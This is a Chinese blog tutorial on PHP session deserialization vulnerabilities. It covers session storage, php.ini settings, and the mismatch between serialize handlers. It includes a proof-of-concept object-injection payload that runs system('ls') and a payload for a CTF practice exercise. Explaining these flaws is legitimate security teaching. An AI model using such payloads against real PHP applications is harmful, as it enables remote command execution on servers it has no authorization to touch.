php反序列化漏洞——session反序列化漏洞

最新推荐文章于 2024-10-06 14:08:22 发布
最新推荐文章于 2024-10-06 14:08:22 发布
阅读量1.4k 收藏 21
点赞数 17
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/137124891
版权

一.了解session

先了解一下什么是session

 session在网络应用中称为“会话控制”,是服务器为了保存用户状态而创建的一个特殊的对象。简而言之,session就是一个对象,用于存储信息。

session有什么用

        我们先来想一个问题,这个问题就是我们在游览购物网站时,我们并没有登录,但是我们任然可以将商品加入购物车,并且进行查看,当我们退出游览器后再打开游览器进行查看时,购物车中依然有我们选择的商品,这该怎么实现呢?

        当然,我们可以使用cookie,但是cookie能存放大量数据吗?这时,我们就需要一种新的技术,Session。session是存储于服务器端的特殊对象,服务器会为每一个游览器(客户端)创建一个唯一的session。这个session是服务器端共享,每个游览器(客户端)独享的。我们可以在session存储数据,实现数据共享。

PHP session工作流程

以PHP为例,理解session的原理

    PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID
        如果Cookie中存在,获取PHPSESSID
        如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器
    初始化超全局变量$_SESSION为一个空数组
    PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件
        存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中
        不存在该文件: session_start()创建一个PHPSESSID命名文件
    程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中

 

php.ini配置

php.ini里面有如下六个相对重要的配置

session.save_path=""      --设置session的存储位置
session.save_handler=""   --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start        --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler --定义用来序列化/反序列化的处理器名字,默认使用php  
session.upload_progress.enabled --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup --读取所有POST数据(即完成上传)后,立即清理进度信息,默认启用

phpstudy下上述配置如下:

session.save_path = "/tmp"      --所有session文件存储在/tmp目录下
session.save_handler = files    --表明session是以文件的方式来进行存储的
session.auto_start = 0          --表明默认不启动session
session.serialize_handler = php --表明session的默认(反)序列化引擎使用的是php(反)序列化引擎
session.upload_progress.enabled on --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup on --表明所有POST数据(即完成上传)后,立即清理进度信息($ _SESSION变量)

在phpstudy根目录下就可以找到temp文件

打开里面就是储存的session文件

上文中提到了 PHP session的存储机制是由session.serialize_handler来定义引擎的,默认是以文件的方式存储,且存储的文件是由sess_sessionid来决定文件名的,当然这个文件名也不是不变的,都是sess_sessionid形式

打开后就是序列化的内容

session.serialize_handler处理器

session.serialize_handler有三种处理器

处理器对应的存储格式
php键名 + 竖线 + 经过 serialize( 函数序列化处理的值
php serialize (php>=5.5.4)经过 serialize() 函数序列化处理的数组
php binary

键名的长度对应的 ASCII 字符 + 键名 + 经过serialize() 函数反序列处理的值

php处理器
<?php
echo "lcycb";
session_start();
$_SESSION['lcycb'] = $_GET['lcy'];

?lcy=cblcy

session文件里的内容是

lcycb|s:5:"cblcy";

php:键名 + 竖线 + 经过 serialize() 函数序列化处理的值

php_serialize处理器
<?php
echo "lcycb";
ini_set('session.serialize_handler', 'php_serialize'); //声明处理器
session_start();
$_SESSION['lcycb'] = $_GET['lcy'];

?lcy=cblcy

session文件里的内容是

a:1:{s:5:"lcycb";s:5:"cblcy";}

php_serialize:经过 serialize() 函数序列化处理的数组

php binary
<?php
echo "lcycb";
ini_set('session.serialize_handler', 'php_binary'); //声明处理器
session_start();
$_SESSION['lcycb'] = $_GET['lcy'];

?lcy=cblcy

php_binary:键名的长度对应的 ASCI 字符 + 键名 +经过 serialize() 函数序列化处理的值

漏洞产生原理

当网站序列化并存储Session
与反序列化并读取session的方式不同

就可能导致session反序列化漏洞的产生

eg:

这个是漏洞产生页面

这个是保存session的页面

在这个页面传参

构造poc

<?php
class D
{
  var $a = "system('ls');";
  
}
echo serialize(new D());

?a=|O:1:"D":1:{s:1:"a";s:13:"system('ls');";}

我们传进去的session

通过php_serialize处理器保存的值应该是

a:1:{s:3:"ben";s:42:"|O:1:"D":1:{s:1:"a";s:13:"system('ls');";}";}

在漏洞产生页面

读取session的时候

是以php处理器处理

a:1:{s:3:"ben";s:42:"|O:1:"D":1:{s:1:"a";s:13:"system('ls');";}";}

它会以为红色部分就是键值名称

绿色部分就是需要反序列化的内容

于是乎把把反序列化D的值赋值给eval函数

从而产生漏洞

例题

http://bc.ccie.work:8002/class21/index.php

打开hint.php

构造poc

<?php
class Flag{
    public $name;
    public $her; 
}
$a = new Flag();
$a -> name = &$a ->her;
echo serialize($a);

payload:

?a=|O:4:"Flag":2:{s:4:"name";N;s:3:"her";R:2;}

在漏洞产生页面即可

阿呆不呆@qq
关注
【网络安全】反序列化漏洞研究
ta737的博客
10-13 205
这里存在一个反序列化入口,就是下图else分支的内容,我们上一方法得到的反序列化数据会进入我们的反序列化入口(注意,allowed_classes 被设置为 false,则在反序列化过程中不会创建对象,只会还原基本数据类型,例如字符串、整数、数组等)。所以我们可以发现,在Yii2框架默认的环境下要进行这个反序列化操作,对php的版本是有所限制的,如下图,可以发现我们的版本中PHP_VERSION_ID 要小于70000才能到达我们期望的反序列化入口。我们可以从调用栈看到已经在进行我们的反序列化过程了。
从某达OA到Yii2框架的cookie反序列化漏洞研究
hackzkaq的博客
10-08 1366
这里存在一个反序列化入口,就是下图else分支的内容,我们上一方法得到的反序列化数据会进入我们的反序列化入口(注意,allowed_classes 被设置为 false,则在反序列化过程中不会创建对象,只会还原基本数据类型,例如字符串、整数、数组等)。这一条路径会使用上面介绍Yii2的cookie处理方法,所以就存在Yii2的那个反序列化入口,在获取到某达oa的config/web.php中的cookieValidationKey值后,我们就可以构造我们的payload进行攻击。
深入浅析PHPsession反序列化漏洞问题
10-19
主要介绍了PHPsession反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞
11-15 217
【序列化简单利用】    serialize()序列化:使用函数serialize()可将实例序列化为字符串  unserialize()反序列化:使用函数unserialize()可将序列化的字符串还原 代码示例: <?php class Example { var $var = ''; function __destruct() { ...
Session反序列化漏洞解析
最新发布
2301_79629995的博客
10-06 1265
当某个用户第一次访问网站时,Session_start()函数会创建一个唯一的SessionID,并通过HTTP响应头,也就是返回包,将SessionID保存在客户端,也就是用户浏览器的Cookie中。以上两PHP文件在session的存储引擎上采用了不同的方式,因此在解析session文件中的数据时就产生了歧义,如对于php_serialize来说 ”|“仅仅只是一个字符,但对于php而言则是分割符,因此对session产生了不同的解析结果,我们通过如下脚本生成payload。s:3:"age";
php session反序列化漏洞详解
qq_39511050的博客
10-25 922
php session反序列化漏洞详解
PHPsession反序列化漏洞
weixin_51706044的博客
09-28 663
带你走进session 在学习 session 反序列化之前,我们需要了解这几个参数的含义。 Directive 含义 session.save_handler session保存形式。默认为files session.save_path session保存路径。 session.serialize_handler session序列化存储所用处理器。默认为phpsession.upload_progress.cleanup 一旦读取了所有POST数据,立即清除进度信息。默认
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 926
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的.
ctf piapiapia(反序列化逃逸)解题记录
rt555016的博客
07-28 1007
ctf piapiapia(反序列化逃逸)解题记录 前言 出现漏洞的两个重要因素是:1、敏感函数,2、可控参数。 打开url是一个登录界面,而且只有一个登录按钮。由于看到了登录界面而且没有验证码所以第一个想法是尝试弱口令登录,显然不成功,所以在这里来走了弯路。该题首先是需要通过目录扫描得到源码压缩包、注册账户的地址,得到源码后进行代码审计,发现蛛丝马迹,最终通过构造修改用户名的字符串利用反序列化逃逸得到在config.php中的flag 一、使用dirserch目录扫描工具对目标进行目录扫描
PHP session反序列化漏洞
weixin_39664643的博客
03-14 5567
PHP session反序列化漏洞 PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器端 session通常是要配合cookie使用 因为HTTP的无状态性,服务端产生了session来标识当前
PHP序列化之Session反序列化漏洞
Firebasky的博客
08-14 740
本文内容主要是出各位师傅那里获取来的,主要是用于记录学习,和自己的一些心得体会。 Session反序列化漏洞 要了解这个漏洞必须知道Session序列化机制。 PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 配置文件php.ini中含有这几个与session存储配置相关的配置项: session.save_path="" --设置session的存储路径,默认在/tmp session.auto_start --指定会话模块是否在请求开始时启动一个会话,默认为0不启动.
PHP session反序列化漏洞总结
mysteryflower的专栏
09-27 892
session的存贮以及序列化以及漏洞 储存session 每个session标签对应着一个$_SESSION键-值类型数组,数组中的东西需要存储下来,首先需要序列化。 在phpsession有三种序列化的方式,分别是php_serialize,phpphp_binary serializer 实现方法 php 键名 + 竖线 + 经过 serialize() 函数反序列...
php Session反序列化漏洞
lonmar的博客
10-27 575
PHP Session 序列化及反序列化处理器 PHP 内置了多种处理器用于存取 $_SESSION 数据时会对数据进行序列化和反序列化,常用的有以下三种,对应三种不同的处理格式: 有关session的配置 session.save_path="" --设置session的存储路径 session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen--指定会话模块是否在请求开始时
PHP session反序列化漏洞原理解析
小王的储物间
01-12 693
官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。session保存的位置是在服务器端session通常是要配合cookie使用因为HTTP的无状态性,服务端产生了session来标识当前的用户状态本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP反序列化入门之session反序列化
weixin_44304686的博客
06-12 1135
原文链接:https://mochazz.github.io/2019/01/29/PHP反序列化入门之session反序列化/ PHPsession机制 在学习 session 反序列化之前,我们需要了解这几个参数的含义。 Directive 含义 session.save_handler session保存形式。默认为files session.save_path ses...
Session 反序列化漏洞
Welcome To Myon'Blog !
07-03 517
Session 反序列化 当序列化存储Session数据与反序列化读取Session数据的方式不同时,就可以利用引擎之间的差异产生序列化注入漏洞session反序列化漏洞就是利用php处理器和php_serialize处理器的存储格式差异。 总的来说就是,我们先判断它是否存在这样一个漏洞,一般看到有这些比较具有特征性PHP代码我们就该想到这个方向,存在session反序列化漏洞的话,我们先进行序列化,然后在结果前添加 | (管道符),在传参页面进行上传,再去刷新读取页面即可。
session反序列化漏洞
07-28
回答: Session反序列化漏洞是一种利用PHP处理器和PHP序列化处理器之间的差异来注入恶意代码的漏洞。当序列化存储Session数据与反序列化读取Session数据的方式不同时,就可以利用这种差异来进行攻击。具体来说,通过构造特定的序列化数据,可以在反序列化时执行恶意代码。例如,在PHP序列化器中,使用竖线(|)分隔键和值,而在PHP序列化器中,竖线后的部分会被忽略。攻击者可以构造恶意的序列化数据,使得在反序列化时执行恶意代码。这种漏洞可以被利用来进行PHP实体注入攻击。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Session 反序列化漏洞](https://blog.csdn.net/Myon5/article/details/131521846)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [PHP session反序列化漏洞总结](https://blog.csdn.net/mysteryflower/article/details/94402887)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值